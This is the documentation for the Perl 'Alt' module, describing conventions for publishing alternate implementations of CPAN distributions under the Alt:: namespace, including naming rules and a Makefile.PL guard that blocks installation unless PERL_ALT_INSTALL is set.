SYSTEMTIME st;
GetSystemTime(&st);
int time1 = (st.wHour*60*60*1000) + (st.wMinute*60*1000) + (st.wSecond*1000) + (st.wMilliseconds);
return time1;
}3 answers
- Anonymous askedA chief minister office is designed in such a way that there is a waiting room adjoining the ministe... Show more
A chief minister office is designed in such a way that there is a waiting room adjoining the minister’s office. Waiting room has two doors D1 and D2, D1 opens inside the minister’s room and D2 is used for entrance from out side. Waiting room has N chairs for some contractors who have to see chief minister. If the minister is busy, the door D1 is closed and arriving contractor sits in one of the available chairs. If a contractor enters the waiting room and all chairs are occupied, the contractor leaves the office without meeting. If there are no contractors in the waiting room, the minister goes to rest (sleep) in the chair with the door D1 open. If minister is asleep, the contractor makes the minister awake by ringing the bell and gets meeting with him.
• Show less
While keeping in mind the given scenario, you have to write the pseudo code OR code fragment using semaphores to define synchronization scheme for the contractor and chief minister.4 answers
|
http://www.chegg.com/homework-help/questions-and-answers/computer-science-archive-2011-december-25
|
CC-MAIN-2014-52
|
refinedweb
| 1,751
| 60.45
|
4 Applications of Regular Expressions that every Data Scientist should know (with Python code)!
Overview
- Regular Expressions or Regex is a versatile tool that every Data Scientist should know about
- Regex can automate various mundane data processing tasks
- Learn about 4 exciting applications of Regex and how to implement them in Python
Introduction
You have seen them, heard about them and probably have already used them for various tasks, without even realizing what happens under the hood? Yes, I’m talking about none other than – Regular Expressions; the quintessential skill for a data scientist’s tool kit!
Regular Expressions are useful for numerous practical day to day tasks that a data scientist encounters. They are used everywhere from data pre-processing to natural language processing, pattern matching, web scraping, data extraction and what not!
That’s why I wanted to write this article, to list some of those mundane tasks that you or your data team can automate with the help of Regular Expressions.
In case your basics of Regex are a bit hazy, I recommend you to read this article for a quick recap:
Table of Contents
- Extracting emails from a Text Document
- Regular Expressions for Web Scraping (Data Collection)
- Working with Date-Time features
- Using Regex for Text Pre-processing (NLP)
Extracting emails from a Text Document
A lot of times, the sales and marketing teams might require finding/extracting emails and other contact information from large text documents.
Now, this can be a cumbersome task if you are trying to do it manually! This is exactly the kind of situations when Regex really shines. Here’s how you can code a basic email extractor:
Just replace the “text” with the text of your document and you are good to go. Here is an example output we got:
Amazing, isn’t it? In case you want to directly read a file and process it, you can simply add the file reading code to the Regex code:
The code might look scary but it is actually very simple to understand. Let me break it down for you. We use re.findall() to extract all the strings from the document which follows the following format:
any character a-z, any digit 0-9 and symbol '_' followed by a '@' symbol and after this symbol we can again have any character, any digit and especially a dot.
Here is an image that would give you a better understanding of the same
Wasn’t that really simple? That’s the thing about Regex, it lets you perform really complex tasks with simple expressions!
Regular Expressions for Web Scraping (Data Collection)
Data collection is a very common part of a Data Scientist’s work and given that we are living in the age of internet, it is easier than ever to find data on the web. One can simply scrape websites like Wikipedia etc. to collect/generate data.
But web scraping has its own issues – the downloaded data is usually messy and full of noise. This is where Regex can be used effectively!
Suppose this is the HTML that you want to work on:
It is from a wikipedia page and has links to various other wikipedia pages. The first thing that you can check is what topics/pages does it have link for?
Let’s use the following regex:
import re re.findall(r">([\w\s()]*?)</a>", html)
import re re.findall(r"\/wiki\/[\w-]*", html)
Working with Date-Time features
Most of the real world data has some kind of Date or Time column associated with it. Such columns carry useful information for the model, but since Date and Time have multiple formats available it becomes difficult to work with such data.
Can we use regex in this case to work with these different formats? Let us find out!
We will start with a simple example, suppose you have a Date-Time value like this:
date = "2018-03-14 06:08:18"
Let’s extract the “Year” from the date. We can simply use regex to find a pattern where 4 digits occur together:
import re re.findall(r"\d{4}", date)
12th September, 2019
Using Regex for Text Pre-processing (NLP)
When working with text data, especially in NLP where we build models for tasks like text classification, machine translation and text summarization, we deal with a variety of text that comes from diverse sources.
For instance, we can have web scraped data, or data that’s manually collected, or data that’s extracted from images using OCR techniques and so on!
As you can imagine, such diversity in data also implies good amount of inconsistencies. Most of this will not useful for our machine learning task as it just adds unnecessary noise and can be removed from the data. This is where Regex really comes handy!
Let’s take the below piece of text as an example:
As it’s evident, the above text has a lot of inconsistencies like random phone numbers, web links, some strange unicode characters of the form “\x86…” etc. For our text classification task, we just need clean and pure text so let’s see how to fix this.
We will write a function to clean this text using Regex:
Once you run the given code on the above text, you will see that the output is pretty clean:
So what did we do here? We basically applied a bunch of operations on our input string:
- Firstly, we removed all the irrelevant links from the text
# removing links newString = re.sub(r'( '', newString)
- We also removed all the digits (phone numbers)
# fetching alphabetic characters newString = re.sub("[^a-zA-Z]", " ", newString)
- Post that we used another useful package of Python nltk to remove stopwords such as “and, the, for” etc. from our text input
# removing stop words tokens = [w for w in newString.split() if not w in stop_words]
- We made sure to ignore any word that is smaller than 3 characters because such abbreviations like “CET”, “BHM” etc. do not add much information unless they are taken into context
# removing short words long_words=[] for i in tokens: if len(i)>=4: long_words.append(i) return (" ".join(long_words)).strip()
So that’s text pre-processing, isn’t it fascinating? You can learn all about text pre-processing from this intuitive blog:
End Note
In this article we saw some simple yet useful ways of using Regular expressions. Yet, we barely scratched the surface of the capabilities of this great tool.
I encourage you to dig deeper and understand how Regex works (as they can be quite confusing in the beginning!) rather than simply using them blindly.
Here are some resources that you can follow to know more about them:
- Regex101 – It is a very useful website to visualize and understand how Regex works under the hood.
- Regex Documentation for Python 3
- Regex Quickstart CheatSheet – This is for those who want to quickly revise regex operators.
Have you used Regex before? Do you want to add an application to this list that I missed? Answer in comments below!
Leave a Reply Your email address will not be published. Required fields are marked *
|
https://www.analyticsvidhya.com/blog/2020/01/4-applications-of-regular-expressions-that-every-data-scientist-should-know-with-python-code/?utm_source=feed&utm_medium=feed-articles
|
CC-MAIN-2022-21
|
refinedweb
| 1,197
| 60.04
|
how to link the object file to a Qt
Hi,
I wrote one simple code in terminal
vi test.c
which displays "Hi"
compiled that test.c file with the help of cross compiler,"arm-linux-gnueabihf-gcc" and generated a object file.
next I copied that object file into my beagleboneboard,using
scp test debian@192.168.7.2:/test
now I want to link this object file which is present in beagleboneboard into Qt,
is it possible to link this object file to Qt? if yes,
then please suggest me how to link ,what are the steps to link that object file in to Qt?
- mrjj Lifetime Qt Champion last edited by mrjj
Hi
In your Qt project file on the beagleboneboard, add
LIBS += THEFILE.o
and make sure that the .o file is in the project folder.
This assumes that its the same compiler on the board as the one
that produced the .o file.
Wildly variation in compiler versions might prevent it from working.
Hi,
"In your Qt project file on the beagleboneboard, add
LIBS += THEFILE.o"
It means I have to add that LIBS +=file.o to my beagleboard test file(executable file)?
- mrjj Lifetime Qt Champion last edited by mrjj
Hi
you must add it to the project on the board so you can compile the .-o into your new exe file.
if you try to like add an o file to binary exe, that wont work.
Sorry,
But I am not getting this
"you must add it to the project on the board"(in board I have only one executable file,that is test)
I need to add it on my qt project file in my system?
- mrjj Lifetime Qt Champion last edited by
@asha
Hi
You need need to add it to the .pro file that produces the Qt application.
So it can be linked into the new exe file.
You can not added to an already compiled app.
So you need to add the .o to the project file for the app, where you want to include the .o file.
Hi,
I am running the application on qt,but not getting the output on qt creator app,
the result i am getting on vnc platform,via command prompt..
so I created .pro file in command prompt,and linked the object file(c++ object file),while executing this object file getting the result in command prompt ,not in vnc platform...
so my question is, is it possible to link the cpp files to qt projects? if yes, how?
the cpp file is:
#include <iostream>
using namespace std;
int main()
{
cout<<"Hello World";
return 0;
}
- mrjj Lifetime Qt Champion last edited by
@Asha
Hi
You can just include the wanted .cpp in the .pro file or
make file or what you use to compile. You can also link it into the porject as an .o file. However, if you have a main in the new .cpp that wont work as
there already is a main for the qt app.
Im not sure what you mean by
"while executing this object file getting the result in command prompt ,not in vnc platform.."
|
https://forum.qt.io/topic/106981/how-to-link-the-object-file-to-a-qt
|
CC-MAIN-2019-47
|
refinedweb
| 528
| 82.65
|
...one of the most highly
regarded and expertly designed C++ library projects in the
world. — Herb Sutter and Andrei
Alexandrescu, C++
Coding Standards
At CPPCon 2016 Jon Kalb gave a very entertaining (and disturbing) lightning talk related to C++ expressions.
The talk included a very, very simple example similar to the following:
// Copyright (c) 2018 Robert Ramey // // Distributed under the Boost Software License, Version 1.0. (See // accompanying file LICENSE_1_0.txt or copy at //) #include <iostream> #include <boost/safe_numerics/safe_integer.hpp> int main(){ std::cout << "example 4: "; std::cout << "implicit conversions change data values" << std::endl; std::cout << "Not using safe numerics" << std::endl; // problem: implicit conversions change data values try{ signed int a{-1}; unsigned int b{1}; std::cout << "a is " << a << " b is " << b << '\n'; if(a < b){ std::cout << "a is less than b\n"; } else{ std::cout << "b is less than a\n"; } std::cout << "error NOT detected!" << std::endl; } catch(const std::exception &){ // never arrive here - just produce the wrong answer! std::cout << "error detected!" << std::endl; return 1; } // solution: replace int with safe<int> and unsigned int with safe<unsigned int> std::cout << "Using safe numerics" << std::endl; try{ using namespace boost::safe_numerics; safe<signed int> a{-1}; safe<unsigned int> b{1}; std::cout << "a is " << a << " b is " << b << '\n'; if(a < b){ std::cout << "a is less than b\n"; } else{ std::cout << "b is less than a\n"; } std::cout << "error NOT detected!" << std::endl; return 1; } catch(const std::exception & e){ // never arrive here - just produce the correct answer! std::cout << e.what() << std::endl; std::cout << "error detected!" << std::endl; } return 0; }
example 3: implicit conversions change data values Not using safe numerics a is -1 b is 1 b is less than a error NOT detected! Using safe numerics a is -1 b is 1 converted negative value to unsigned: domain error error detected!
A normal person reads the above code and has to be dumbfounded by
this. The code doesn't do what the text - according to the rules of
algebra - says it does. But C++ doesn't follow the rules of algebra - it
has its own rules. There is generally no compile time error. You can get a
compile time warning if you set some specific compile time switches. The
explanation lies in reviewing how C++ reconciles binary expressions
(
a < b is an expression here) where operands are different
types. In processing this expression, the compiler:
Determines the "best" common type for the two operands. In
this case, application of the rules in the C++ standard dictate that
this type will be an
unsigned int.
Converts each operand to this common type. The signed value of -1 is converted to an unsigned value with the same bit-wise contents, 0xFFFFFFFF, on a machine with 32 bit integers. This corresponds to a decimal value of 4294967295.
Performs the calculation - in this case it's
<, the "less than" operation. Since 1 is less than
4294967295 the program prints "b is less than a".
In order for a programmer to detect and understand this error he should be pretty familiar with the implicit conversion rules of the C++ standard. These are available in a copy of the standard and also in the canonical reference book The C++ Programming Language (both are over 1200 pages long!). Even experienced programmers won't spot this issue and know to take precautions to avoid it. And this is a relatively easy one to spot. In the more general case this will use integers which don't correspond to easily recognizable numbers and/or will be buried as a part of some more complex expression.
This example generated a good amount of web traffic along with everyone's pet suggestions. See for example a blog post with everyone's favorite "solution". All the proposed "solutions" have disadvantages and attempts to agree on how handle this are ultimately fruitless in spite of, or maybe because of, the emotional content. Our solution is by far the simplest: just use the safe numerics library as shown in the example above.
Note that in this particular case, usage of the safe types results in no runtime overhead in using the safe integer library. Code generated will either equal or exceed the efficiency of using primitive integer types.
|
https://www.boost.org/doc/libs/develop/libs/safe_numerics/doc/html/tutorial/4.html
|
CC-MAIN-2020-50
|
refinedweb
| 721
| 53.31
|
At 03:53 9/8/00 -0700, you wrote:
>As far as I understood the difference is in which ClassLoader space 'blah'
>will be loaded. If you use *only* system class loader there is no
>difference,
>if you use your own class loaders you can drop into the problem (for example
>with security), cause first method loads class in the namespace of system
>(bootstrap)
>class loader, second in the namespace of class from the left of .getClass().
yep thats right so.
getClass().getClassLoader().loadClass("blah")
loads blah from classloader that was used to load current class. This means
if you use classloaders that expand your classpath then you will always
load from primeordial rather than current.
There are also some serious issues when you need to resolve classes that
occur higher up in classpath hierarchy that require classes lower down or
when you are running in a secured environment 1.2+ (Specifically with
associating ProtectedDomains to CodeSources)
Cheers,
Pete
*------------------------------------------------------*
| "Nearly all men can stand adversity, but if you want |
| to test a man's character, give him power." |
| -Abraham Lincoln |
*------------------------------------------------------*
|
http://mail-archives.apache.org/mod_mbox/ant-dev/200008.mbox/%3C3.0.6.32.20000810113213.008961a0@latcs2.cs.latrobe.edu.au%3E
|
CC-MAIN-2015-27
|
refinedweb
| 180
| 54.97
|
Hi! [ Had this sitting here half drafted, but as I got poked privately also due to the apparent incoherence in the first part, I'm sending the reply for that now. And will handle the other part later on. Although, I guess, because it might be only partly on topic, I'm considering whether it might be better to do more extensive write-ups elsewhere on my website or similar, to articulate it properly, and then possibly link it here, as then I'd also have reference to point to. Because I do realize (or at least that seems apparent), mine is probably a very minority view within the project, and that people going on and on on this kind of tirades and ramblings become annoying and/or tiresome fast. So then I could try to stop interjecting on the subject, while evaluating how much these situation bother me until they become unbearable, at which point I'd just disengage and distance myself from work involving them. ] On Tue, 2018-07-31 at 19:43:32 -0700, Russ Allbery wrote: > Guillem Jover <guillem@debian.org> writes: > > If someone wants to see dpkg changed in some way related to this, I'd > > request the same thing I did to Ian a couple of years ago, gather input > > from derivatives and other current users, on their reasons for using it, > > or start a discussion with them on whether they'd be satisfied with > > potential alternatives, etc. > > At least from a Policy perspective, I don't see any obvious need to remove > the feature from dpkg regardless of the outcome of this discussion (nor do > I think that's within the scope that Policy should even consider). dpkg > may support all kinds of things that Debian chooses not to use or even > prohibit in the archive, and I think that division is healthy and good. > dpkg is a more general tool than just Debian. Indeed! > dgit is *also* a more general tool than just Debian, of course, and I can > see some reasons why the dgit maintainers may aspire to handling every > package that dpkg can handle, even ones that wouldn't be uploaded to > Debian, and thus may care about whether the feature is supported at all. > But I think that's outside the scope of Policy and could be discussed > betweeen dpkg and dgit maintainers if that's a concern. Exactly! > > That Ubuntu finds it to be a problem as a Debian downstream, with these > > packages percolating into Ubuntu? Well, you could also have tried to > > argue your case to the ftp-masters and lintian maintainers, that this > > is making your life difficult, and whether they would reject packages > > with debian/patches/ubuntu.series. Or convince the maintainers in > > Debian using them that this is in fact not helping you. > > > Apparently, you do not even need to do that anymore, you just need to > > get a ctte to ban them from Debian. > > I'm a bit confused about why you're upset with us asking the Technical > Committee to make a decision when you're (apparently, maybe I'm > misunderstanding) fine with asking ftp-master to reject such packages. Of > those two things, I think the Technical Committee discussion is more open, > collaborative, and accountable than asking ftp-master to reject packages! > (Indeed, if I were ftp-master, I would just bump the request to the > Technical Committee anyway, since I wouldn't want to make that sort of > decision on the basis of just the ftp-master delegation authority.) The root problem is that AFAICS there's been at least three different ways the interested parties have expressed a desire they wanted this getting enforced, for quite different reasons, that have gotten mingled in here: * Ban this everywhere at the dpkg level (dgit and Ubuntu interest). * Ban this for all Debian at the ftp-master/lintian level via policy (Ubuntu interest, fallback dgit interest). * Ban this at the vendor level (Ubuntu interest) Ideally? Yes, I'd like for any of the interested parties to get the users of the feature and possibly convince them they are doing it wrong, and if so why, and what they could do instead, or for the complaining part to realize this might have some merit, and solve the apparent problems they have with technical means. But for the Ubuntu case, which is what I was explicitly discussing with Steve, the reality is slightly different. The Ubuntu organization is reigned by their own rules, and it's a different entity to Debian, and how they reach their conclusions and policies is for them to decide, and even if how they do that might not be my cup of tea, I'm just not involved and I don't think it's my place to question their processes. So, if Ubuntu, as an organization, decides that the ubuntu.series file is not good for them, and they are going to ban it no matter what, probably at their boundaries. Asking ftp-masters or lintian maintainers to honor that wish and do that for them would just help them, and not change the outcome much. Those two teams could obviously decide they do not want to be in the middle of possibly angry maintainers and the derivative, but that's for these teams to decide. I'm not sure why we'd reject that at the Debian level TBH. It's also in their namespace so it seems only fair they get to have a say IMO. Thanks, Guillem
|
https://lists.debian.org/debian-policy/2018/08/msg00083.html
|
CC-MAIN-2019-39
|
refinedweb
| 922
| 51.21
|
Alex Schroeder <address@hidden> writes: > One good solution to this problem is to write interactive functions > for the most useful cases so that you can call them directly. There > need not be many of them: > > compare-windows-sync-word > compare-windows-sync-sentence > compare-windows-sync-defun > compare-windows-sync-regexp -- this one would query for a regexp Adding the interactive function for syncing seems to be a good thing. But what troubles me the most is the namespace wasting. Instead of creating n number of compare-windows-sync-* functions it's better to create one interactive function (e.g. compare-windows-sync-windows) which when called with argument C-u will ask the user for a function name (e.g. forward-word, forward-sentence) or a regexp (anyhow, one of your proposed functions asks for a regexp) and will set the buffer-local compare-windows-sync variable to this function or regexp. If the compare-windows-sync-windows is called without C-u, it could use the previously saved value of compare-windows-sync. --
|
http://lists.gnu.org/archive/html/emacs-devel/2003-08/msg00178.html
|
CC-MAIN-2016-50
|
refinedweb
| 175
| 50.87
|
06 March 2012 11:48 [Source: ICIS news]
By Elaine Burridge and Andy Brice
?xml:namespace>
After years of unparalleled growth,
With
According to Keller, the Chinese government is intelligently mastering the economy. There is still enough funding available to provide a reasonable subsidy policy for social infrastructure projects and fiscal revenues are very solid, he said.
“The Chinese economy has been quite strong over the last few years and what we expect is a soft landing, which means that annual growth rates will come down to approx 8%,” said Keller. “But we see that the Chinese government has actions as well as financial resources in place to manage a soft landing in a reasonable and structured way.”
Currently, GDP in
Keller pointed out that some 35% of private consumption makes up
The major change we will see in
As a result, the health and education sectors will thrive in the coming years and become core industries.
From an investment perspective, growth will be more selective in the future, said Keller, with more attention paid to small- and medium-sized enterprises (SMEs) and less on the larger projects.
“I think there are a number of challenges the Chinese chemical industry has to face. One is that the industry structure needs to change. We are currently seeing a large number of small, entrepreneurial companies and we see a limited number of huge strong conglomerates. What we are missing in
For all its growth,
“Definitely for the next 10 years, exports to Europe and the
“There is no
|
http://www.icis.com/Articles/2012/03/06/9538430/video-china-is-slowing-but-still-strong-says-consultant.html
|
CC-MAIN-2014-42
|
refinedweb
| 256
| 56.59
|
SETREGID(2) BSD Programmer's Manual SETREGID(2)
setregid - set real and effective group IDs
#include <unistd.h> int setregid(gid_t rgid, gid_t egid);
The real and effective group IDs of the current process are set according to the arguments. If the real group ID is changed, the saved group ID is changed to the new value of the effective group ID. Unprivileged users may change either group ID to the current value of the real, effective, or saved group ID. Only the superuser may make other changes. Supplying a value of -1 for either the real or effective group ID forces the system to substitute the current ID in place of the -1 parameter. The setregid() function was intended to allow swapping the real and ef- fective group IDs in set-group-ID programs to temporarily relinquish the set-group-ID value. This purpose is now better served by the use of the setegid() function (see setuid(2)). When setting the real and effective group IDs to the same value, the set- gid() function is preferred.
Upon successful completion, a value of 0 is returned. Otherwise, a value of -1 is returned and errno is set to indicate the error.
[EPERM] The current process is not the superuser and a change other than changing the effective group ID to the real group ID was specified.
getgid(2), setegid(2), setgid(2), setresgid(2), setuid(2)
The setregid() function conforms to the IEEE Std 1003.1-2001 ("POSIX") and X/Open Portability Guide Issue 4.3 ("XPG4.3"). specifications. Note, however, that prior to IEEE Std 1003.1-2001 ("POSIX"), the setre- gid() function was not a part of the IEEE Std 1003.1 ("POSIX") specifica- tion. As a result, it may not be implemented on all systems.
The setregid() function call appeared in 4.2BSD. A semantically different version appeared in 4.4BSD. The current version, with the original seman- tics restored, appeared in OpenBSD 3.3.
The setregid() function predates POSIX saved group IDs. This implementa- tion changes the saved group ID to the new value of the effective group ID if the real group ID is changed. Other implementations may behave dif- ferently. MirOS BSD #10-current January 29,.
|
https://www.mirbsd.org/htman/i386/man2/setregid.htm
|
CC-MAIN-2015-48
|
refinedweb
| 372
| 65.93
|
Each Answer to this Q is separated by one/two green lines.
I want to modify a module xyz and its functions like that:
def modify(fun): modulename = fun.__module__ # this is string. ok, but not enough import xyz modify(xzy.test)
My problem is how to access the namespace of
xzy inside
modify. Sometimes
globals()[fun.__module__]
works. But then I get problems if the definition
modify is in a different file than the rest of
the code.
Use the inspect module:
import inspect def modify(fun): module = inspect.getmodule(fun)
This is the same as polling the module from
sys.modules using
fun.__module__. Although
getmodule tries harder even if
fun does not have a
__module__ attribute.
You want to get the module object from its name? Look it up in the
sys.modules dictionary that contains all currently loaded modules:
import sys def modify(func): module = sys.modules[func.__module__]
You could try
modulename = fun.__module__ module = __import__(modulename)
You do not want to do this.
It does not work. Imagine you defined a function in module
abcand then imported it in
xyz.
test.__module__would be
'abc'when you called
modify(xyz.test). You would then know to change
abc.testand you would not end up modifying
xyz.testat all!
Monkey patching should be avoided. Fooling with the global state of your program is ill-advised. Instead of doing this, why cannot you just make the new, modified thing and use it?
|
https://techstalking.com/programming/python/getting-corresponding-module-from-function/
|
CC-MAIN-2022-40
|
refinedweb
| 245
| 61.83
|
Sorting glyphs by "density"
- RicardGarcia last edited by
Hello, lately I have been thinking about using a typeface to generate some images using glyphs as "pixels" depending on whether they have less or more black. I guess the process to do so is to use a grayscale image and assign one glyph or another for each pixel depending on how light or how dark it is.
Do you have any idea how to generate this and group glyphs, for instance, in 4 groups from lightest to darkest?
Thanks!
hello @RicardGarcia,
there are probably different ways to define the ‘density’ of a glyph. in this example, it is defined as the ratio between the glyph area and the total glyph box area:
from fontTools.pens.areaPen import AreaPen CHARS = 'abcdefghijklmnopqrstuvwxyz$%&@' FONTNAME = 'Menlo-Bold' FONTSIZE = 1000 # set font properties fontSize(FONTSIZE) font(FONTNAME) lineHeight(FONTSIZE) # measure glyph densities and collect values in a dict densities = {} for char in CHARS: # get total area for glyph w, h = textSize(char) # get area of 'black' surface B = BezierPath() B.text(char, (0, 0), font=FONTNAME, fontSize=FONTSIZE) pen = AreaPen() B.drawToPen(pen) area = abs(pen.value) # calculate density as percentage of black density = area / (w * h) # store density value in dict densities[char] = density
you could also calculate density by rasterizing the glyph and counting the black pixels…
hope this helps!
- RicardGarcia last edited by gferreira
Thanks @gferreira!
I didn't know that there were already functions that could calculate the area of a vector. It's nice to know that I could also calculate the amount of pixels each character takes but for now I'm totally fine with your suggestion using the "density" of a
BezierPath().
I can use this useful piece of code to design what I have in mind so thanks a lot!
There may be useful code here:
|
https://forum.drawbot.com/topic/212/sorting-glyphs-by-density/3
|
CC-MAIN-2019-51
|
refinedweb
| 308
| 59.03
|
How to handle activation from a toast notification (HTML)
Note Not using JavaScript? See How
Note When testing toast notification code functionality through Microsoft Visual Studio, you must use either the Local Machine or Remote Machine debug setting on a Windows x86, x64, or Windows Runtime machine. You cannot use the Visual Studio Simulator debug function option—your code will compile and run in the Simulator, but the toast will not appear. Create your first Windows Store app using JavaScript..
Step 2: Register for the "activated" event
When the user clicks on your toast or selects it through touch, the activated event is fired. Your app must register through the addEventListener function be informed of the event.
Note If you do not include a launch attribute string in your toast and your app is already running when the toast is selected, the activated event is not fired.
Step 3: Implement a handler for your toast's "activated" event
Your registered event handler receives all activation events, regardless of the activation type. The kind property included in the event notification indicates the type of activation event. When the user clicks on a toast that has a launch attribute specified in its XML payload, an activation event of kind launch is fired. This is the same event that is raised when a user taps on an app's primary or secondary tile.
The activation string that you provided through the launch attribute in step 1 is included in the event notification's arguments property.
This example shows the outline of the activated event handler registered in step 2.
Related topics
- Toast notifications sample
- Windows.UI.Notifications API namespace
- Toast notification overview
- Guidelines and checklist for toast notifications
- Quickstart: Sending a toast notification
- The toast template catalog
- Toast XML schema
|
http://msdn.microsoft.com/en-in/library/windows/apps/hh761468.aspx
|
CC-MAIN-2014-41
|
refinedweb
| 297
| 51.78
|
23 May 2012 03:47 [Source: ICIS news]
SINGAPORE (ICIS)--Asia’s largest synthetic rubber producer, South Korea’s Kumho Petrochemical (KKPC), has further cut the operating rates of its synthetic rubber plants because of weak market conditions, a company source said on Wednesday.
It has cut the operating rate of its 430,000 tonne/year styrene butadiene rubber (SBR) plant to 40-50% of capacity and its 350,000 tonne/year butadiene rubber (BR) plant to 60% of capacity, the source added.
Both the SBR and BR plants were running at reduced rates since early May.
“It is an emergency situation because of the continued weakness in demand. Both these plants will run at the reduced rates for at least two weeks until mid-June,” the source added.
SBR non-oil grade 1502 spot prices were at $2,900-3,000/tonne (€2,291-2,370/tonne) CIF (cost, freight, insurance) ?xml:namespace>
BR spot prices were at $3,300-3,400/tonne CFR (cost and freight) northeast
|
http://www.icis.com/Articles/2012/05/23/9562516/south-koreas-kumho-petrochemical-cuts-ops-on-weak-demand.html
|
CC-MAIN-2015-22
|
refinedweb
| 169
| 58.92
|
This blog will discuss features about .NET, both windows and web development.
The DataContext object supports using the TransactionScope object, defined in the System.Transactions namespace. You can easily do the following in your code:
using (TransactionScope ts = new TransactionScope()){ myContext.SubmitChanges(); ts.Complete();}
If there is an issue, it's raised as an exception and the changes are not submitted in that case.
Whenever you need to figure out what's changed, use the DataContext.GetChangeSet method, which returns a ChangeSet object. This object has inserts, updates, and deletes collection of items that this action is being performed for. It's an object collection because its got every LINQ class that fits into that category lumped into one collection.
When trying to get a panel to display dynamically in conjunction with the HoverMenuExtender, there are some issues with displaying the content while forcing a scrollbar using the overflow-x and overflow-y CSS styles. As a personal recommendation, to implement a vertical scrollbar for a panel, set the width and height for the panel appropriately, and set overflow-x: hidden and overflow-y:scroll in your style. This is what it took to implement scrolling for one of my projects. + "');";}
When working with WPF, there is an adjustment with how objects are created that you may not be used to in other environments. Suppose you have the following window:
<
To prevent this, check the IsInitialized property on the form, and if not initialized, exit the method as such:
if (!this.IsInitialized) return;
That way, the initial firing of the event, when the window is initialized, is prevented. This is only needed when accessing other elements..
Some content
</
In order for this to work, a client-side script needs rendered, which can be added to the script manager. The script file has our client event handler as discussed above. This is the middle step, to register the script file.
Lastly, the following script accesses the tab container. It simply outputs information about the control raising the event:
/// <reference name="MicrosoftAjax.js"/>
{
msg +=
alert(msg);
}
Third, each javascript class defines a get_element property that returns a reference to the underlying html element. The last one uses the ownerDocument property that gains reference to the underlying URL (this is not an add-on to javascript).
The following gets emitted:
Header: Test2Active Index: 1ID: tcPage:
What you may not realize if you open up a converted VS 2008 project and get no intellisense is that the designer utilizes sort of a namespace inheritance approach. For instance, if you create a new AJAX client behavior javascript file, you will see this at the top:
This lets VS know to use the objects defined in this file, similar to how you use "using System.Web.UI.WebControls". There are a variety of options available, and if you look through the AJAX Control Toolkit code, you will find some different files you can import into your scripts.
A co-worker of mine was using LINQ to SQL and trying to write a query that connected across multiple data context objects connecting to different databases. However, this was an issue because LINQ doesn't allow this to happen. The LINQ object "knows" that it is part of a different data context, and a detailed message specifies that this isn't allowed to happen. So, what is the solution? One of the things we did was to pull back the first data source in a query, and call the ToList() option. We were pulling back one field anyway, so the ToList() option was a good option to separate the single value from the data context.
I was developing today and got a StackOverflowException, and I quickly realized what it was. One of the ways you get this is if you do "too much" in the constructor; that is, you can do limited things in the constructor. If you get this from something you are doing in the constructor, that means you can't do it.
I also get this if you get a circular reference, meaning that you have a property like this:
public string Text{ get { return this.Text; }}
This is a recursive, infinite loop when accessed, when you really meant to do this:
public string Text{ get { return _text; }}
So watch out for those things, and know that this exception may mean you have an infinite loop in your.
I was wondering if it was possible to change the AJAX tab container and its child TabPanel controls. The reason is; the white background conflicted with my color scheme. In doing some research, I found this:
See, the tabcontainer control defines some in-line styles that it uses, and it's possible to override them by specifying that particular name (like ajax__tab_body) as a child class such as this:
.MyStyle .ajax__tab_body{<!-- Some style -->}
This MyStyle style can be applied to the tabcontainer, and the body will be overridden. I tried that, and overrode all of my styles, including the image tabs! There wasn't any header. So, I ended up scrapping it for now, but maybe some of this may make some sense to you. Maybe I set it up wrong, and I hope that maybe you can have better success than me.
Link to us
All material is copyrighted by its respective authors. Site design and layout
is copyrighted by DotNetSlackers.
Advertising Software by Ban Man Pro
|
http://dotnetslackers.com/Community/blogs/bmains/archive/2008/02.aspx
|
crawl-003
|
refinedweb
| 901
| 61.46
|
What that article doesn't mention, and the key benefit in my project, is that when you use @AutoWired, you can have the Spring-invoked initialization method marked as private, to avoid polluting your public API.
Spring config:
>
Java class with static field:; } }
This is a big improvement over my previous unsatisfactory solution, which was to use org.springframework.beans.factory.config.MethodInvokingFactoryBean with a public method on StaticHub like this:
.
You can also use @Qualifier to disambiguate if you have multiple beans in your Spring container which implement MyInterface:
import org.springframework.beans.factory.annotation.Qualifier; ... private StaticHub(@Qualifier("myPrecious") MyInterface instance) { theStaticInstance = instance; }
Before you use this, consider carefully whether static fields are actually a good idea - in general this kind of pattern is something Spring is designed to help you avoid!
In my project there are good reasons for it, but it needs thought - things get complicated quickly in environments with multiple classloaders, or with multiple Spring containers inside the same classloader; it also makes it harder to use newfangled clustering technologies which let you scale to multiple JVMs.
Nice Solution, Good Work.
Thank so much!
Nice work. I think there is also another difference when using the MethodInvokingFactoryBean. Where you can use the static method and not have the bean (that has the static method) in the container, the method is just used as initialization.
Using your beans as example
If you don't specify and just use the MethodInvokingFactoryBean declaration then since your static setInstance method returns void, there is no bean generated. I used this to initialize a class with just statics that i did not want in the container.
Looks like some of my comment got cut off since i used the xml notation. It should say
If you don't specify bean class="very.public.api.StaticHub" name="dummyInstanceOfStaticHub" and just use .....
Thanks alot...it worked for me !!!
It is NOT working in Spring 3.1.3 . Who ever has it got worked are you using different Spring version than Spring 3.1.3 ..?
The project I was using was on Spring 3.0.0 - haven't tested it with anything else.
Tried with 4.1.6 and it still doesn't work. Although, thanks for the article!
But you are having to create an instance of StaticHub - then what is the point of making the variable static if we had to create an object for it? Its like a hack and is of no real use but academic demonstration . :-(
The benefit: we don't have a public constructor or setter. The "hack" allows us to keep the static API clean.
|
http://planproof-fool.blogspot.com/2010/03/spring-setting-static-fields.html
|
CC-MAIN-2017-30
|
refinedweb
| 439
| 64.71
|
NAME
Alt - Alternate Module Implementations
SYNOPSIS
PERL_ALT_INSTALL=OVERWRITE cpanm Alt::IO::All::Redux:
PERL_ALT_INSTALL=OVERWRITE.
ALT BEST PRACTICES
This idea is new, and the details should be sorted out through proper discussions. Pull requests welcome.
Here are the basic guidelines for best using the Alt namespace:
- Name Creation
Names for alternate modules should be minted like this:
"Alt-$Original_Dist_Name-$phrase"
For instance, if MSTROUT wants to make an alternate IO-All distribution to have it be Moo-based, he might call it:
Alt-IO-All-Moo.
- Makefile.PL Changes
Due to experience with problems, it is important to make your Alt module not install without explicit direction. You can accomplish this easily in a Makefile.PL, with something like this:
my $alt = $ENV{PERL_ALT_INSTALL} || ''; $WriteMakefileArgs{DESTDIR} = $alt ? $alt eq 'OVERWRITE' ? '' : $alt : 'no-install-alt';
Similar techniques should be available for other module release frameworks.
- Module for CPAN Indexing
You will need to provide a module like
Alt::IO::All::MSTROUTso that CPAN will index something that can cause your distribution to get installed by people:
